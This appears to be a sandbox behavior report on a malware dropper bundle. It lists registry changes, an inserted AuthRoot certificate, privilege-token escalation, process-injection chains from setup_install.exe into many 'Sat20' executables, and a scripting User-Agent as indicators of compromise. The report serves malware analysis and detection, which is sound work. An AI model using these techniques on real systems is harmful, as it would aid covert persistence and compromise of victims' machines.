Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | LzmwAqmV.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | LzmwAqmV.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73dc9f6540424edb47d450dd49d084297dce82e72baa46d34fdc48d541dc1b00f3480cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd98cb57e23ef955e0ccdfc8d387287cc186270a4f93824dc814d713ae3ad5019c1bd | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73dec8d540424edb47d450dd49d084297dce82e72baa46d34fdc48d541d7fc847678bcd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd98abc7b26ec9c5f03ccc4e13b7e85c12b496da0f15d15d88448733ae5aa511ff4d3e1394ba9dd1d51fdf7bc54 | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection" | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | LzmwAqmV.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73dfff1540424edb47d450dd49d084297dce82e72baa46d34fdc48d541dfed39e7587cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd988b07e2dec915e03c8c4e13b7e85c12b496da0f15d15d88448733ae4a5501af4 | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | svchost.exe
Modifies registry class 64 IoCs
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{9B0E3558-B836-49EA-A3C8-08F6C84DDEE2} = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\ProgID | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66" | FileSyncConfig.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | MicrosoftEdgeCP.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{B5C25645-7426-433F-8A5F-42B7FF27A7B2}\TYPELIB | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\PROXYSTUBCLSID32 | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ = "ISyncChangesCallback" | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32 | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Japanese Phone Converter" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler.1 | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ = "ISyncEngineCOMServer" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "1033" | MicrosoftEdgeCP.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\OOBERequestHandler.OOBERequestHandler | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32 | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32 | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\ = "SyncingOverlayHandler Class" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusToastActivator.NucleusToastActivator\ = "NucleusToastActivator Class" | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2} | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182} | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | MicrosoftEdgeCP.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TYPELIB | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A} | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\PROXYSTUBCLSID32 | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\TYPELIB\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\FLAGS | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}\PROGID | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON | FileSyncConfig.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "57" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "MS-1033-110-WINMO-DNN" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32 | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "316" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "395" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = b9d9ec28329fd701 | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" | MicrosoftEdge.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LOCALSERVER32 | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32 | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6} | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002\\amd64\\FileSyncShell64.dll" | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "363" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ = "IFileSyncClient" | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TYPELIB | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\PROXYSTUBCLSID32 | OneDriveSetup.exe
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\INPROCSERVER32 | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32 | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "357" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusToastActivator.NucleusToastActivator\CLSID\ = "{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ = "NucleusToastActivator Class" | OneDriveSetup.exe
Processes:
Process: Sat200240b71b.exe
description ioc process
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 Sat200240b71b.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sat200240b71b.exe
-
Script User-Agent 2 IoCs
Uses a User-Agent string associated with a script host or scripting environment. "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" is the default User-Agent of the WinHttp.WinHttpRequest COM object, which VBScript, JScript and PowerShell code commonly uses for HTTP requests; compiled programs can use the same object, so on its own this is a weak indicator and is best read together with the destination and the process that produced the flow.
Processes:
description flow ioc
HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 222 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process
3024 powershell.exe (2 rows)
4632 Sat20de8d8504.exe (2 rows)
3024 powershell.exe (2 rows)
1016 Sat20ecdfe3ee79f.exe (58 rows; the table stops at 64 rows)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process
3040 Explorer.EXE
-
Suspicious behavior: MapViewOfSection 21 IoCs
Processes:
pid process
4632 Sat20de8d8504.exe
6404 ALU9NmuUdiXkXK7aVOwsE9z7.exe
8888 cyhXA10eOOPKGx2fm1TIDtyP.exe
7452 3CD9.exe
7364 compattelrunner.exe
7780 MicrosoftEdgeCP.exe (4 rows)
7372 MicrosoftEdgeCP.exe (2 rows)
3160 ustucsu
7372 MicrosoftEdgeCP.exe (6 rows)
1000 ustucsu
7372 MicrosoftEdgeCP.exe (2 rows)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description pid process
4108 Sat20873bc74eb80e0.exe: Token: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35 (34 rows: every privilege LUID from 2 to 35 is enabled in one pass)
Token: SeDebugPrivilege 4604 Sat205eb4a2ece877a.exe
Token: SeDebugPrivilege 4600 Sat20ed203af5.exe
Token: SeDebugPrivilege 3024 powershell.exe
Token: SeDebugPrivilege 4444 Sat2071d99516dc03841.exe
Token: SeDebugPrivilege 3356 Ze2ro.exe
Token: SeShutdownPrivilege 3040 Explorer.EXE
Token: SeCreatePagefilePrivilege 3040 Explorer.EXE
Token: SeShutdownPrivilege 3040 Explorer.EXE
Token: SeCreatePagefilePrivilege 3040 Explorer.EXE
Token: SeDebugPrivilege 4456 7541406.scr
Token: SeShutdownPrivilege 3040 Explorer.EXE
Token: SeCreatePagefilePrivilege 3040 Explorer.EXE
Token: SeRestorePrivilege 1848 WerFault.exe
Token: SeBackupPrivilege 1848 WerFault.exe
Token: SeShutdownPrivilege 3040 Explorer.EXE
Token: SeCreatePagefilePrivilege 3040 Explorer.EXE
Token: SeShutdownPrivilege 3040 Explorer.EXE
Token: SeCreatePagefilePrivilege 3040 Explorer.EXE
Token: SeDebugPrivilege 4384 2.exe
Token: SeShutdownPrivilege 3040 Explorer.EXE
Token: SeCreatePagefilePrivilege 3040 Explorer.EXE
Token: SeDebugPrivilege 2700 PublicDwlBrowser1100.exe
Token: SeDebugPrivilege 2468 5125044.scr
Token: SeDebugPrivilege 3504 rundll32.exe
Token: SeDebugPrivilege 1848 WerFault.exe
3360 askinstall58.exe: Token: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege (5 rows; the table stops at 64 rows)
-
Suspicious use of FindShellTrayWindow 29 IoCs
Processes:
pid process
3040 Explorer.EXE (6 rows)
4952 ultramediaburner.tmp
5652 setup_2.tmp
3040 Explorer.EXE (21 rows)
-
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
pid process
3040 Explorer.EXE
-
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
pid process
3040 Explorer.EXE
9108 MicrosoftEdge.exe
9680 MicrosoftEdgeCP.exe
4556 MicrosoftEdge.exe
7780 MicrosoftEdgeCP.exe (2 rows)
1320 MicrosoftEdge.exe
7372 MicrosoftEdgeCP.exe (2 rows)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 4956 setup_x86_x64_install.exe wrote to memory of 4988 setup_installer.exe (3 rows)
PID 4988 setup_installer.exe wrote to memory of 5088 setup_install.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 4024 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3332 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3400 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3568 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3728 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3596 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3764 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 4400 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 4412 cmd.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 4432 cmd.exe (3 rows)
PID 4024 cmd.exe wrote to memory of 3024 powershell.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 4128 cmd.exe (3 rows)
PID 3596 cmd.exe wrote to memory of 4108 Sat20873bc74eb80e0.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3692 cmd.exe (3 rows)
PID 3568 cmd.exe wrote to memory of 4444 Sat2071d99516dc03841.exe (2 rows)
PID 3400 cmd.exe wrote to memory of 3128 Sat20578e6239.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 3820 cmd.exe (3 rows)
PID 3728 cmd.exe wrote to memory of 3424 Sat20fbae42a4.exe (3 rows)
PID 3332 cmd.exe wrote to memory of 1016 Sat20ecdfe3ee79f.exe (3 rows)
PID 5088 setup_install.exe wrote to memory of 1792 cmd.exe (2 rows; the table stops at 64 rows)
